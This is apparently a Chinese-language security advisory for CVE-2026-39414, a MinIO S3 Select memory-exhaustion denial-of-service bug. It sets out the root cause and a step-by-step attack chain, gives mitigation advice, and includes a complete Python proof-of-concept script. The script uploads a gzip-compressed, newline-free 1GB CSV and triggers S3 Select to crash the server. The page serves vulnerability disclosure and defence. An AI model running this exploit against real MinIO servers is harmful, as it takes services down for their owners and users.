CVE-2026-39414 CVSS 6.5 中危

CVE-2026-39414 MinIO S3 Select 内存耗尽漏洞

披露日期: 2026-04-08

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-39414

漏洞类型

拒绝服务

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

MinIO

漏洞概述

MinIO S3 Select功能存在内存耗尽漏洞，攻击者可上传特制CSV文件导致服务OOM崩溃。该漏洞需低权限认证，结合压缩攻击效果更显著，严重影响服务可用性。

技术细节

漏洞位于MinIO的S3 Select CSV处理模块中，根源在于`nextSplit()`函数调用`bufio.Reader.ReadBytes('\n')`时未设置读取大小限制。当处理包含极长行（无换行符）的CSV文件时，程序会将整个输入缓冲到内存中直至找到换行符。攻击者只需具备`s3:PutObject`和`s3:GetObject`权限，上传一个不含换行符的CSV文件（特别是经过gzip压缩的小文件，解压后体积巨大），即可触发服务器内存溢出（OOM），导致MinIO服务进程崩溃。

攻击链分析

STEP 1

1. 权限获取

攻击者获取拥有 s3:PutObject 和 s3:GetObject 权限的 MinIO 账号凭证。

STEP 2

2. 构造恶意文件

攻击者创建一个不含换行符的大文件，并使用 gzip 进行高压缩比压缩。

STEP 3

3. 上传文件

攻击者将压缩后的恶意 CSV 文件上传至 MinIO 服务器。

STEP 4

4. 触发解析

攻击者调用 S3 Select API 对该对象进行查询，触发 CSV 解析流程。

STEP 5

5. 内存耗尽

服务器尝试解压并读取整个文件行到内存，导致内存溢出，MinIO 进程崩溃。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import boto3
import gzip
import io

# Configuration
ENDPOINT = 'http://localhost:9000'
ACCESS_KEY = 'minioadmin'
SECRET_KEY = 'minioadmin'
BUCKET_NAME = 'test-bucket'
OBJECT_NAME = 'exploit.csv.gz'

# Create malicious CSV data (No newlines)
# Generates a large amount of data that is compressed to a small size
print("Generating payload...")
malicious_data = b'A' * (1024 * 1024 * 1024) # 1GB of 'A's

# Compress the data
buf = io.BytesIO()
with gzip.GzipFile(fileobj=buf, mode='wb') as f:
    f.write(malicious_data)
compressed_data = buf.getvalue()
print(f"Compressed size: {len(compressed_data)} bytes")

# Initialize S3 client
s3 = boto3.client('s3',
                  endpoint_url=ENDPOINT,
                  aws_access_key_id=ACCESS_KEY,
                  aws_secret_access_key=SECRET_KEY)

# Upload the malicious file
print("Uploading payload...")
s3.put_object(Bucket=BUCKET_NAME, Key=OBJECT_NAME, Body=compressed_data)

# Trigger S3 Select to parse the CSV
# This will cause the server to decompress and read the 1GB line into memory
print("Triggering S3 Select...")
sql_query = "SELECT * FROM S3Object"
try:
    response = s3.select_object_content(
        Bucket=BUCKET_NAME,
        Key=OBJECT_NAME,
        Expression=sql_query,
        ExpressionType='SQL',
        InputSerialization={'CSV': {}, 'CompressionType': 'GZIP'},
        OutputSerialization={'CSV': {}}
    )
    # Consuming the event stream to ensure the request is processed
    for event in response['Payload']:
        pass
    print("Exploit triggered. Check server memory status.")
except Exception as e:
    print(f"Error (Server might have crashed): {e}")

影响范围

MinIO RELEASE.2018-08-18T03-49-57Z 至 RELEASE.2025-12-20T04-58-37Z 之前

防御指南

临时缓解措施

如果无法立即升级，建议限制普通用户的 s3:GetObject 权限，或通过 WAF/网关层拦截针对 S3 Select 的异常请求。同时，应密切监控服务器内存使用率，一旦发现异常升高自动重启服务。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表